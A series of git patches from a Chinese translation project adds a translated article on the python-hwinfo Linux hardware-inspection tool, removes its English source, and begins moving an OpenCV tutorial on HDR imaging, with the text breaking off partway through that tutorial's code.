+[1]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[2]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_008-1.png ()
+[3]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_009.png ()
+[4]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=reddit (Click to share on Reddit)
+[5]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=twitter (Click to share on Twitter)
+[6]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=facebook (Click to share on Facebook)
+[7]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=google-plus-1 (Click to share on Google+)
+[8]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=linkedin (Click to share on LinkedIn)
+[9]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=pocket (Click to share on Pocket)
+[10]:whatsapp://send?text=How%20To%20Easily%20Find%20Awesome%20Projects%20And%20Resources%20Hosted%20In%20GitHub%20https%3A%2F%2Fwww.ostechnix.com%2Feasily-find-awesome-projects-resources-hosted-github%2F (Click to share on WhatsApp)
+[11]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=telegram (Click to share on Telegram)
+[12]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/?share=email (Click to email this to a friend)
+[13]:https://www.ostechnix.com/easily-find-awesome-projects-resources-hosted-github/#print (Click to print)
From 2e1636b4babccc4a4b410e102eb142dd4e752cc2 Mon Sep 17 00:00:00 2001
From: Torival
Date: Wed, 10 Jan 2018 20:00:11 +0800
Subject: [PATCH 218/371] Create 20171005 python-hwinfo - Display Summary Of
Hardware Information In Linux.md
---
...ummary Of Hardware Information In Linux.md | 179 ++++++++++++++++++
1 file changed, 179 insertions(+)
create mode 100644 translated/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md
diff --git a/translated/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md b/translated/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md
new file mode 100644
index 0000000000..e56ce8e292
--- /dev/null
+++ b/translated/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md
@@ -0,0 +1,179 @@
+# python-hwinfo:使用Linux系统工具展示硬件信息概况
+
+---
+到目前为止,获取Linux系统硬件信息和配置已经被大部分工具所涵盖,不过也有许多命令可用于相同目的。
+
+而且,一些工具会显示所有硬件组成的详细信息,重置后,只显示特定设备的信息。
+
+在这个系列中, 今天我们讨论一下关于[python-hwinfo][1], 它是一个展示硬件信息概况和整洁配置的工具之一。
+
+### 什么是python-hwinfo
+
+这是一个通过解析系统工具(例如lspci和dmidecode)的输出,来检查硬件和设备的Python库。
+
+它提供了一个简单的命令行工具,可以用来检查本地,远程和捕获到的主机。用sudo运行命令以获得最大的信息。
+
+另外,你可以提供服务器IP或者主机名,用户名和密码,在远程的服务器上执行它。当然你也可以使用这个工具查看其它工具捕获的输出(例如demidecode输出的'dmidecode.out',/proc/cpuinfo输出的'cpuinfo',lspci -nnm输出的'lspci-nnm.out')。
+
+**建议阅读 :**
+**(#)** [inxi - A Great Tool to Check Hardware Information on Linux][2]
+**(#)** [Dmidecode - Easy Way To Get Linux System Hardware Information][3]
+**(#)** [LSHW (Hardware Lister) - A Nifty Tool To Get A Hardware Information On Linux][4]
+**(#)** [hwinfo (Hardware Info) - A Nifty Tool To Detect System Hardware Information On Linux][5]
+**(#)** [How To Use lspci, lsscsi, lsusb, And lsblk To Get Linux System Devices Information][6]
+
+### Linux上如何安装python-hwinfo
+
+在绝大多数Linux发行版,都可以通过pip包安装。为了安装python-hwinfo, 确保你的系统已经有python和python-pip包作为先决条件。
+
+pip是Python附带的一个包管理工具,在Linux上安装Python包的推荐工具之一。
+
+在**`Debian/Ubuntu`**平台,使用[APT-GET 命令][7] 或者 [APT 命令][8] 安装pip。
+```
+$ sudo apt install python-pip
+
+```
+
+在**`RHEL/CentOS`**平台,使用[YUM 命令][9]安装pip。
+```
+$ sudo yum install python-pip python-devel
+
+```
+
+在**`Fedora`**平台,使用[DNF 命令][10]安装pip。
+```
+$ sudo dnf install python-pip
+
+```
+
+在**`Arch Linux`**平台,使用[Pacman 命令][11]安装pip。
+```
+$ sudo pacman -S python-pip
+
+```
+
+在**`openSUSE`**平台,使用[Zypper 命令][12]安装pip。
+```
+$ sudo zypper python-pip
+
+```
+
+最后,执行下面的pip命令安装python-hwinfo。
+```
+$ sudo pip install python-hwinfo
+
+```
+
+### 怎么使用python-hwinfo在本地机器
+
+执行下面的命令,检查本地机器现有的硬件。输出很清楚和整洁,这是我在其他命令中没有看到的。
+
+它的输出分为了五类。
+
+ * **`Bios Info:`** bios供应商名称,系统产品名称, 系统序列号,系统唯一标识符,系统制造商,bios发布日期和bios版本。
+ * **`CPU Info:`** 处理器编号,供应商ID,cpu系列代号,型号,制作更新版本,型号名称,cpu主频。
+ * **`Ethernet Controller Info:`** 供应商名称,供应商ID,设备名称,设备ID,子供应商名称,子供应商ID,子设备名称,子设备ID。
+ * **`Storage Controller Info:`** 供应商名称,供应商ID,设备名称,设备ID,子供应商名称,子供应商ID,子设备名称,子设备ID。
+ * **`GPU Info:`** 供应商名称,供应商ID,设备名称,设备ID,子供应商名称,子供应商ID,子设备名称,子设备ID。
+
+
+```
+$ sudo hwinfo
+
+Bios Info:
+
++----------------------+--------------------------------------+
+| Key | Value |
++----------------------+--------------------------------------+
+| bios_vendor_name | IBM |
+| system_product_name | System x3550 M3: -[6102AF1]- |
+| system_serial_number | RS2IY21 |
+| chassis_type | Rack Mount Chassis |
+| system_uuid | 4C4C4544-0051-3210-8052-B2C04F323132 |
+| system_manufacturer | IBM |
+| socket_count | 2 |
+| bios_release_date | 10/21/2014 |
+| bios_version | -[VLS211TSU-2.51]- |
+| socket_designation | Socket 1, Socket 2 |
++----------------------+--------------------------------------+
+
+CPU Info:
+
++-----------+--------------+------------+-------+----------+------------------------------------------+----------+
+| processor | vendor_id | cpu_family | model | stepping | model_name | cpu_mhz |
++-----------+--------------+------------+-------+----------+------------------------------------------+----------+
+| 0 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-1607 0 @ 3.00GHz | 1200.000 |
+| 1 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-1607 0 @ 3.00GHz | 1200.000 |
+| 2 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-1607 0 @ 3.00GHz | 1200.000 |
+| 3 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-1607 0 @ 3.00GHz | 1200.000 |
+| 4 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-2650 0 @ 2.00GHz | 1200.000 |
++-----------+--------------+------------+-------+----------+------------------------------------------+----------+
+
+Ethernet Controller Info:
+
++-------------------+-----------+---------------------------------+-----------+-------------------+--------------+---------------------------------+--------------+
+| vendor_name | vendor_id | device_name | device_id | subvendor_name | subvendor_id | subdevice_name | subdevice_id |
++-------------------+-----------+---------------------------------+-----------+-------------------+--------------+---------------------------------+--------------+
+| Intel Corporation | 8086 | I350 Gigabit Network Connection | 1521 | Intel Corporation | 8086 | I350 Gigabit Network Connection | 1521 |
++-------------------+-----------+---------------------------------+-----------+-------------------+--------------+---------------------------------+--------------+
+
+Storage Controller Info:
+
++-------------------+-----------+----------------------------------------------+-----------+----------------+--------------+----------------+--------------+
+| vendor_name | vendor_id | device_name | device_id | subvendor_name | subvendor_id | subdevice_name | subdevice_id |
++-------------------+-----------+----------------------------------------------+-----------+----------------+--------------+----------------+--------------+
+| Intel Corporation | 8086 | C600/X79 series chipset IDE-r Controller | 1d3c | Dell | 1028 | [Device 05d2] | 05d2 |
+| Intel Corporation | 8086 | C600/X79 series chipset SATA RAID Controller | 2826 | Dell | 1028 | [Device 05d2] | 05d2 |
++-------------------+-----------+----------------------------------------------+-----------+----------------+--------------+----------------+--------------+
+
+GPU Info:
+
++--------------------+-----------+-----------------------+-----------+--------------------+--------------+----------------+--------------+
+| vendor_name | vendor_id | device_name | device_id | subvendor_name | subvendor_id | subdevice_name | subdevice_id |
++--------------------+-----------+-----------------------+-----------+--------------------+--------------+----------------+--------------+
+| NVIDIA Corporation | 10de | GK107GL [Quadro K600] | 0ffa | NVIDIA Corporation | 10de | [Device 094b] | 094b |
++--------------------+-----------+-----------------------+-----------+--------------------+--------------+----------------+--------------+
+
+```
+
+### 怎么使用python-hwinfo在远处机器上
+
+执行下面的命令检查远程机器现有的硬件,需要远程机器IP,用户名和密码
+```
+$ hwinfo -m x.x.x.x -u root -p password
+
+```
+
+### 如何使用python-hwinfo读取捕获的输出
+
+执行下面的命令,检查本地机器现有的硬件。输出很清楚和整洁,这是我在其他命令中没有看到的。
+```
+$ hwinfo -f [Path to file]
+
+```
+
+--------------------------------------------------------------------------------
+
+via: https://www.2daygeek.com/python-hwinfo-check-display-system-hardware-configuration-information-linux/
+
+作者:[2DAYGEEK][a]
+译者:[Torival](https://github.com/Torival)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.2daygeek.com/author/2daygeek/
+[1]:https://github.com/rdobson/python-hwinfo
+[2]:https://www.2daygeek.com/inxi-system-hardware-information-on-linux/
+[3]:https://www.2daygeek.com/dmidecode-get-print-display-check-linux-system-hardware-information/
+[4]:https://www.2daygeek.com/lshw-find-check-system-hardware-information-details-linux/
+[5]:https://www.2daygeek.com/hwinfo-check-display-detect-system-hardware-information-linux/
+[6]:https://www.2daygeek.com/check-system-hardware-devices-bus-information-lspci-lsscsi-lsusb-lsblk-linux/
+[7]:https://www.2daygeek.com/apt-get-apt-cache-command-examples-manage-packages-debian-ubuntu-systems/
+[8]:https://www.2daygeek.com/apt-command-examples-manage-packages-debian-ubuntu-systems/
+[9]:https://www.2daygeek.com/yum-command-examples-manage-packages-rhel-centos-systems/
+[10]:https://www.2daygeek.com/dnf-command-examples-manage-packages-fedora-system/
+[11]:https://www.2daygeek.com/pacman-command-examples-manage-packages-arch-linux-system/
+[12]:https://www.2daygeek.com/zypper-command-examples-manage-packages-opensuse-system/
+
+
From 329c0f404537525ea9445e514fb42d6783bdedc0 Mon Sep 17 00:00:00 2001
From: Torival
Date: Wed, 10 Jan 2018 20:02:28 +0800
Subject: [PATCH 219/371] Delete 20171005 python-hwinfo - Display Summary Of
Hardware Information In Linux.md
---
...ummary Of Hardware Information In Linux.md | 176 ------------------
1 file changed, 176 deletions(-)
delete mode 100644 sources/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md
diff --git a/sources/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md b/sources/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md
deleted file mode 100644
index e066269efb..0000000000
--- a/sources/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md
+++ /dev/null
@@ -1,176 +0,0 @@
-Translating by Torival python-hwinfo : Display Summary Of Hardware Information In Linux
-======
-Till the date, we have covered most of the utilities which discover Linux system hardware information & configuration but still there are plenty of commands available for the same purpose.
-
-In that, some of the utilities are display detailed information about all the hardware components and reset will shows only specific device information.
-
-In this series, today we are going to discuss about [python-hwinfo][1], it is one of the tool that display summary of hardware information and it's configuration in the neat way.
-
-### What's python-hwinfo
-
-This is a python library for inspecting hardware and devices by parsing the outputs of system utilities such as lspci and dmidecode.
-
-It's offering a simple CLI toll which can be used for inspect local, remote and captured hosts. Run the command with sudo to get maximum information.
-
-Additionally you can execute this on remote server by providing a Server IP or Host name, username, and password. Also you can use this tool to view other utilities captured outputs like demidecode as 'dmidecode.out', /proc/cpuinfo as 'cpuinfo', lspci -nnm as 'lspci-nnm.out', etc,.
-
-**Suggested Read :**
-**(#)** [inxi - A Great Tool to Check Hardware Information on Linux][2]
-**(#)** [Dmidecode - Easy Way To Get Linux System Hardware Information][3]
-**(#)** [LSHW (Hardware Lister) - A Nifty Tool To Get A Hardware Information On Linux][4]
-**(#)** [hwinfo (Hardware Info) - A Nifty Tool To Detect System Hardware Information On Linux][5]
-**(#)** [How To Use lspci, lsscsi, lsusb, And lsblk To Get Linux System Devices Information][6]
-
-### How to Install python-hwinfo in Linux
-
-It can be installed through pip package to all major Linux distributions. In order to install python-hwinfo, Make sure your system have python and python-pip packages as a prerequisites.
-
-pip is a python module bundled with setuptools, it's one of the recommended tool for installing Python packages in Linux.
-
-For **`Debian/Ubuntu`** , use [APT-GET Command][7] or [APT Command][8] to install pip.
-```
-$ sudo apt install python-pip
-
-```
-
-For **`RHEL/CentOS`** , use [YUM Command][9] to install pip.
-```
-$ sudo yum install python-pip python-devel
-
-```
-
-For **`Fedora`** , use [DNF Command][10] to install pip.
-```
-$ sudo dnf install python-pip
-
-```
-
-For **`Arch Linux`** , use [Pacman Command][11] to install pip.
-```
-$ sudo pacman -S python-pip
-
-```
-
-For **`openSUSE`** , use [Zypper Command][12] to install pip.
-```
-$ sudo zypper python-pip
-
-```
-
-Finally, Run the following pip command to install python-hwinfo.
-```
-$ sudo pip install python-hwinfo
-
-```
-
-### How to Use python-hwinfo in local machine
-
-Execute the following command to inspect the hardware present on a local machine. The output is much clear and neat which i didn't see in any other commands.
-
-It's categorized the output in five classes.
-
- * **`Bios Info:`** It 's contains bios_vendor_name, system_product_name, system_serial_number, system_uuid, system_manufacturer, bios_release_date, and bios_version
- * **`CPU Info:`** It 's display no of processor, vendor_id, cpu_family, model, stepping, model_name, and cpu_mhz
- * **`Ethernet Controller Info:`** It 's shows device_bus_id, vendor_name, vendor_id, device_name, device_id, subvendor_name, subvendor_id, subdevice_name, and subdevice_id
- * **`Storage Controller Info:`** It 's shows vendor_name, vendor_id, device_name, device_id, subvendor_name, subvendor_id, subdevice_name, and subdevice_id
- * **`GPU Info:`** It 's shows vendor_name, vendor_id, device_name, device_id, subvendor_name, subvendor_id, subdevice_name, and subdevice_id
-
-
-```
-$ sudo hwinfo
-
-Bios Info:
-
-+----------------------|--------------------------------------+
-| Key | Value |
-+----------------------|--------------------------------------+
-| bios_vendor_name | IBM |
-| system_product_name | System x3550 M3: -[6102AF1]- |
-| system_serial_number | RS2IY21 |
-| chassis_type | Rack Mount Chassis |
-| system_uuid | 4C4C4544-0051-3210-8052-B2C04F323132 |
-| system_manufacturer | IBM |
-| socket_count | 2 |
-| bios_release_date | 10/21/2014 |
-| bios_version | -[VLS211TSU-2.51]- |
-| socket_designation | Socket 1, Socket 2 |
-+----------------------|--------------------------------------+
-
-CPU Info:
-
-+-----------|--------------|------------|-------|----------|------------------------------------------|----------+
-| processor | vendor_id | cpu_family | model | stepping | model_name | cpu_mhz |
-+-----------|--------------|------------|-------|----------|------------------------------------------|----------+
-| 0 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-1607 0 @ 3.00GHz | 1200.000 |
-| 1 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-1607 0 @ 3.00GHz | 1200.000 |
-| 2 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-1607 0 @ 3.00GHz | 1200.000 |
-| 3 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-1607 0 @ 3.00GHz | 1200.000 |
-| 4 | GenuineIntel | 6 | 45 | 7 | Intel(R) Xeon(R) CPU E5-2650 0 @ 2.00GHz | 1200.000 |
-+-----------|--------------|------------|-------|----------|------------------------------------------|----------+
-
-Ethernet Controller Info:
-
-+-------------------|-----------|---------------------------------|-----------|-------------------|--------------|---------------------------------|--------------+
-| vendor_name | vendor_id | device_name | device_id | subvendor_name | subvendor_id | subdevice_name | subdevice_id |
-+-------------------|-----------|---------------------------------|-----------|-------------------|--------------|---------------------------------|--------------+
-| Intel Corporation | 8086 | I350 Gigabit Network Connection | 1521 | Intel Corporation | 8086 | I350 Gigabit Network Connection | 1521 |
-+-------------------|-----------|---------------------------------|-----------|-------------------|--------------|---------------------------------|--------------+
-
-Storage Controller Info:
-
-+-------------------|-----------|----------------------------------------------|-----------|----------------|--------------|----------------|--------------+
-| vendor_name | vendor_id | device_name | device_id | subvendor_name | subvendor_id | subdevice_name | subdevice_id |
-+-------------------|-----------|----------------------------------------------|-----------|----------------|--------------|----------------|--------------+
-| Intel Corporation | 8086 | C600/X79 series chipset IDE-r Controller | 1d3c | Dell | 1028 | [Device 05d2] | 05d2 |
-| Intel Corporation | 8086 | C600/X79 series chipset SATA RAID Controller | 2826 | Dell | 1028 | [Device 05d2] | 05d2 |
-+-------------------|-----------|----------------------------------------------|-----------|----------------|--------------|----------------|--------------+
-
-GPU Info:
-
-+--------------------|-----------|-----------------------|-----------|--------------------|--------------|----------------|--------------+
-| vendor_name | vendor_id | device_name | device_id | subvendor_name | subvendor_id | subdevice_name | subdevice_id |
-+--------------------|-----------|-----------------------|-----------|--------------------|--------------|----------------|--------------+
-| NVIDIA Corporation | 10de | GK107GL [Quadro K600] | 0ffa | NVIDIA Corporation | 10de | [Device 094b] | 094b |
-+--------------------|-----------|-----------------------|-----------|--------------------|--------------|----------------|--------------+
-
-```
-
-### How to Use python-hwinfo in remote machine
-
-Execute the following command to inspect the hardware present on a remote machine which required remote server IP, username, and password.
-```
-$ hwinfo -m x.x.x.x -u root -p password
-
-```
-
-### How to Use python-hwinfo to read captured outputs
-
-Execute the following command to inspect the hardware present on a local machine. The output is much clear and neat which i didn't see in any other commands.
-```
-$ hwinfo -f [Path to file]
-
-```
-
---------------------------------------------------------------------------------
-
-via: https://www.2daygeek.com/python-hwinfo-check-display-system-hardware-configuration-information-linux/
-
-作者:[2DAYGEEK][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.2daygeek.com/author/2daygeek/
-[1]:https://github.com/rdobson/python-hwinfo
-[2]:https://www.2daygeek.com/inxi-system-hardware-information-on-linux/
-[3]:https://www.2daygeek.com/dmidecode-get-print-display-check-linux-system-hardware-information/
-[4]:https://www.2daygeek.com/lshw-find-check-system-hardware-information-details-linux/
-[5]:https://www.2daygeek.com/hwinfo-check-display-detect-system-hardware-information-linux/
-[6]:https://www.2daygeek.com/check-system-hardware-devices-bus-information-lspci-lsscsi-lsusb-lsblk-linux/
-[7]:https://www.2daygeek.com/apt-get-apt-cache-command-examples-manage-packages-debian-ubuntu-systems/
-[8]:https://www.2daygeek.com/apt-command-examples-manage-packages-debian-ubuntu-systems/
-[9]:https://www.2daygeek.com/yum-command-examples-manage-packages-rhel-centos-systems/
-[10]:https://www.2daygeek.com/dnf-command-examples-manage-packages-fedora-system/
-[11]:https://www.2daygeek.com/pacman-command-examples-manage-packages-arch-linux-system/
-[12]:https://www.2daygeek.com/zypper-command-examples-manage-packages-opensuse-system/
From 4bcc5e11be8e2f9cd90d7c4ca9ae94876f95cd2c Mon Sep 17 00:00:00 2001
From: Flowsnow
Date: Wed, 10 Jan 2018 21:17:41 +0800
Subject: [PATCH 220/371] =?UTF-8?q?=E7=BF=BB=E8=AF=91=E5=AE=8C=E6=88=90-20?=
=?UTF-8?q?171002=20High=20Dynamic=20Range=20Imaging=20using=20OpenCV=20Cp?=
=?UTF-8?q?p=20python.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...c Range Imaging using OpenCV Cpp python.md | 423 ------------------
...c Range Imaging using OpenCV Cpp python.md | 416 +++++++++++++++++
2 files changed, 416 insertions(+), 423 deletions(-)
delete mode 100644 sources/tech/20171002 High Dynamic Range Imaging using OpenCV Cpp python.md
create mode 100644 translated/tech/20171002 High Dynamic Range Imaging using OpenCV Cpp python.md
diff --git a/sources/tech/20171002 High Dynamic Range Imaging using OpenCV Cpp python.md b/sources/tech/20171002 High Dynamic Range Imaging using OpenCV Cpp python.md
deleted file mode 100644
index 3af2d30333..0000000000
--- a/sources/tech/20171002 High Dynamic Range Imaging using OpenCV Cpp python.md
+++ /dev/null
@@ -1,423 +0,0 @@
-translating by flowsnow
-
-High Dynamic Range (HDR) Imaging using OpenCV (C++/Python)
-============================================================
-
-
-
-In this tutorial, we will learn how to create a High Dynamic Range (HDR) image using multiple images taken with different exposure settings. We will share code in both C++ and Python.
-
-### What is High Dynamic Range (HDR) imaging?
-
-Most digital cameras and displays capture or display color images as 24-bits matrices. There are 8-bits per color channel and the pixel values are therefore in the range 0 – 255 for each channel. In other words, a regular camera or a display has a limited dynamic range.
-
-However, the world around us has a very large dynamic range. It can get pitch black inside a garage when the lights are turned off and it can get really bright if you are looking directly at the Sun. Even without considering those extremes, in everyday situations, 8-bits are barely enough to capture the scene. So, the camera tries to estimate the lighting and automatically sets the exposure so that the most interesting aspect of the image has good dynamic range, and the parts that are too dark and too bright are clipped off to 0 and 255 respectively.
-
-In the Figure below, the image on the left is a normally exposed image. Notice the sky in the background is completely washed out because the camera decided to use a setting where the subject (my son) is properly photographed, but the bright sky is washed out. The image on the right is an HDR image produced by the iPhone.
-
- [![High Dynamic Range (HDR)](http://www.learnopencv.com/wp-content/uploads/2017/09/high-dynamic-range-hdr.jpg)][3]
-
-How does an iPhone capture an HDR image? It actually takes 3 images at three different exposures. The images are taken in quick succession so there is almost no movement between the three shots. The three images are then combined to produce the HDR image. We will see the details in the next section.
-
-The process of combining different images of the same scene acquired under different exposure settings is called High Dynamic Range (HDR) imaging.
-
-### How does High Dynamic Range (HDR) imaging work?
-
-In this section, we will go through the steps of creating an HDR image using OpenCV.
-
-To easily follow this tutorial, please [download][4] the C++ and Python code and images by clicking [here][5]. If you are interested to learn more about AI, Computer Vision and Machine Learning, please [subscribe][6] to our newsletter.
-
-### Step 1: Capture multiple images with different exposures
-
-When we take a picture using a camera, we have only 8-bits per channel to represent the dynamic range ( brightness range ) of the scene. But we can take multiple images of the scene at different exposures by changing the shutter speed. Most SLR cameras have a feature called Auto Exposure Bracketing (AEB) that allows us to take multiple pictures at different exposures with just one press of a button. If you are using an iPhone, you can use this [AutoBracket HDR app][7] and if you are an android user you can try [A Better Camera app][8].
-
-Using AEB on a camera or an auto bracketing app on the phone, we can take multiple pictures quickly one after the other so the scene does not change. When we use HDR mode in an iPhone, it takes three pictures.
-
-1. An underexposed image: This image is darker than the properly exposed image. The goal is the capture parts of the image that very bright.
-
-2. A properly exposed image: This is the regular image the camera would have taken based on the illumination it has estimated.
-
-3. An overexposed image: This image is brighter than the properly exposed image. The goal is the capture parts of the image that very dark.
-
-However, if the dynamic range of the scene is very large, we can take more than three pictures to compose the HDR image. In this tutorial, we will use 4 images taken with exposure time 1/30, 0.25, 2.5 and 15 seconds. The thumbnails are shown below.
-
- [![Auto Exposure Bracketed HDR image sequence](http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-image-sequence.jpg)][9]
-
-The information about the exposure time and other settings used by an SLR camera or a Phone are usually stored in the EXIF metadata of the JPEG file. Check out this [link][10] to see EXIF metadata stored in a JPEG file in Windows and Mac. Alternatively, you can use my favorite command line utility for EXIF called [EXIFTOOL ][11].
-
-Let’s start by reading in the images are assigning the exposure times
-
-C++
-
-```
-void readImagesAndTimes(vector &images, vector ×)
-{
-
- int numImages = 4;
-
- // List of exposure times
- static const float timesArray[] = {1/30.0f,0.25,2.5,15.0};
- times.assign(timesArray, timesArray + numImages);
-
- // List of image filenames
- static const char* filenames[] = {"img_0.033.jpg", "img_0.25.jpg", "img_2.5.jpg", "img_15.jpg"};
- for(int i=0; i < numImages; i++)
- {
- Mat im = imread(filenames[i]);
- images.push_back(im);
- }
-
-}
-```
-
-Python
-
-```
-def readImagesAndTimes():
- # List of exposure times
- times = np.array([ 1/30.0, 0.25, 2.5, 15.0 ], dtype=np.float32)
-
- # List of image filenames
- filenames = ["img_0.033.jpg", "img_0.25.jpg", "img_2.5.jpg", "img_15.jpg"]
- images = []
- for filename in filenames:
- im = cv2.imread(filename)
- images.append(im)
-
- return images, times
-```
-
-### Step 2: Align Images
-
-Misalignment of images used in composing the HDR image can result in severe artifacts. In the Figure below, the image on the left is an HDR image composed using unaligned images and the image on the right is one using aligned images. By zooming into a part of the image, shown using red circles, we see severe ghosting artifacts in the left image.
-
- [![Misalignment problem in HDR](http://www.learnopencv.com/wp-content/uploads/2017/10/aligned-unaligned-hdr-comparison.jpg)][12]
-
-Naturally, while taking the pictures for creating an HDR image, professional photographer mount the camera on a tripod. They also use a feature called [mirror lockup][13] to reduce additional vibrations. Even then, the images may not be perfectly aligned because there is no way to guarantee a vibration-free environment. The problem of alignment gets a lot worse when images are taken using a handheld camera or a phone.
-
-Fortunately, OpenCV provides an easy way to align these images using `AlignMTB`. This algorithm converts all the images to median threshold bitmaps (MTB). An MTB for an image is calculated by assigning the value 1 to pixels brighter than median luminance and 0 otherwise. An MTB is invariant to the exposure time. Therefore, the MTBs can be aligned without requiring us to specify the exposure time.
-
-MTB based alignment is performed using the following lines of code.
-
-C++
-
-```
-// Align input images
-Ptr alignMTB = createAlignMTB();
-alignMTB->process(images, images);
-```
-
-Python
-
-```
-# Align input images
-alignMTB = cv2.createAlignMTB()
-alignMTB.process(images, images)
-```
-
-### Step 3: Recover the Camera Response Function
-
-The response of a typical camera is not linear to scene brightness. What does that mean? Suppose, two objects are photographed by a camera and one of them is twice as bright as the other in the real world. When you measure the pixel intensities of the two objects in the photograph, the pixel values of the brighter object will not be twice that of the darker object! Without estimating the Camera Response Function (CRF), we will not be able to merge the images into one HDR image.
-
-What does it mean to merge multiple exposure images into an HDR image?
-
-Consider just ONE pixel at some location (x,y) of the images. If the CRF was linear, the pixel value would be directly proportional to the exposure time unless the pixel is too dark ( i.e. nearly 0 ) or too bright ( i.e. nearly 255) in a particular image. We can filter out these bad pixels ( too dark or too bright ), and estimate the brightness at a pixel by dividing the pixel value by the exposure time and then averaging this brightness value across all images where the pixel is not bad ( too dark or too bright ). We can do this for all pixels and obtain a single image where all pixels are obtained by averaging “good” pixels.
-
-But the CRF is not linear and we need to make the image intensities linear before we can merge/average them by first estimating the CRF.
-
-The good news is that the CRF can be estimated from the images if we know the exposure times for each image. Like many problems in computer vision, the problem of finding the CRF is set up as an optimization problem where the goal is to minimize an objective function consisting of a data term and a smoothness term. These problems usually reduce to a linear least squares problem which are solved using Singular Value Decomposition (SVD) that is part of all linear algebra packages. The details of the CRF recovery algorithm are in the paper titled [Recovering High Dynamic Range Radiance Maps from Photographs][14].
-
-Finding the CRF is done using just two lines of code in OpenCV using `CalibrateDebevec` or `CalibrateRobertson`. In this tutorial we will use `CalibrateDebevec`
-
-C++
-
-```
-// Obtain Camera Response Function (CRF)
-Mat responseDebevec;
-Ptr calibrateDebevec = createCalibrateDebevec();
-calibrateDebevec->process(images, responseDebevec, times);
-
-```
-
-Python
-
-```
-# Obtain Camera Response Function (CRF)
-calibrateDebevec = cv2.createCalibrateDebevec()
-responseDebevec = calibrateDebevec.process(images, times)
-```
-
-The figure below shows the CRF recovered using the images for the red, green and blue channels.
-
- [![Camera Response Function](http://www.learnopencv.com/wp-content/uploads/2017/10/camera-response-function.jpg)][15]
-
-### Step 4: Merge Images
-
-Once the CRF has been estimated, we can merge the exposure images into one HDR image using `MergeDebevec`. The C++ and Python code is shown below.
-
-C++
-
-```
-// Merge images into an HDR linear image
-Mat hdrDebevec;
-Ptr mergeDebevec = createMergeDebevec();
-mergeDebevec->process(images, hdrDebevec, times, responseDebevec);
-// Save HDR image.
-imwrite("hdrDebevec.hdr", hdrDebevec);
-```
-
-Python
-
-```
-# Merge images into an HDR linear image
-mergeDebevec = cv2.createMergeDebevec()
-hdrDebevec = mergeDebevec.process(images, times, responseDebevec)
-# Save HDR image.
-cv2.imwrite("hdrDebevec.hdr", hdrDebevec)
-```
-
-The HDR image saved above can be loaded in Photoshop and tonemapped. An example is shown below.
-
- [![HDR Photoshop tone mapping](http://www.learnopencv.com/wp-content/uploads/2017/10/hdr-Photoshop-Tonemapping-1024x770.jpg)][16] HDR Photoshop tone mapping
-
-### Step 5: Tone mapping
-
-Now we have merged our exposure images into one HDR image. Can you guess the minimum and maximum pixel values for this image? The minimum value is obviously 0 for a pitch black condition. What is the theoretical maximum value? Infinite! In practice, the maximum value is different for different situations. If the scene contains a very bright light source, we will see a very large maximum value.
-
-Even though we have recovered the relative brightness information using multiple images, we now have the challenge of saving this information as a 24-bit image for display purposes.
-
-The process of converting a High Dynamic Range (HDR) image to an 8-bit per channel image while preserving as much detail as possible is called Tone mapping.
-
-There are several tone mapping algorithms. OpenCV implements four of them. The thing to keep in mind is that there is no right way to do tone mapping. Usually, we want to see more detail in the tonemapped image than in any one of the exposure images. Sometimes the goal of tone mapping is to produce realistic images and often times the goal is to produce surreal images. The algorithms implemented in OpenCV tend to produce realistic and therefore less dramatic results.
-
-Let’s look at the various options. Some of the common parameters of the different tone mapping algorithms are listed below.
-
-1. gamma : This parameter compresses the dynamic range by applying a gamma correction. When gamma is equal to 1, no correction is applied. A gamma of less than 1 darkens the image, while a gamma greater than 1 brightens the image.
-
-2. saturation : This parameter is used to increase or decrease the amount of saturation. When saturation is high, the colors are richer and more intense. Saturation value closer to zero, makes the colors fade away to grayscale.
-
-3. contrast : Controls the contrast ( i.e. log (maxPixelValue/minPixelValue) ) of the output image.
-
-Let us explore the four tone mapping algorithms available in OpenCV.
-
-#### Drago Tonemap
-
-The parameters for Drago Tonemap are shown below
-
-```
-createTonemapDrago
-(
-float gamma = 1.0f,
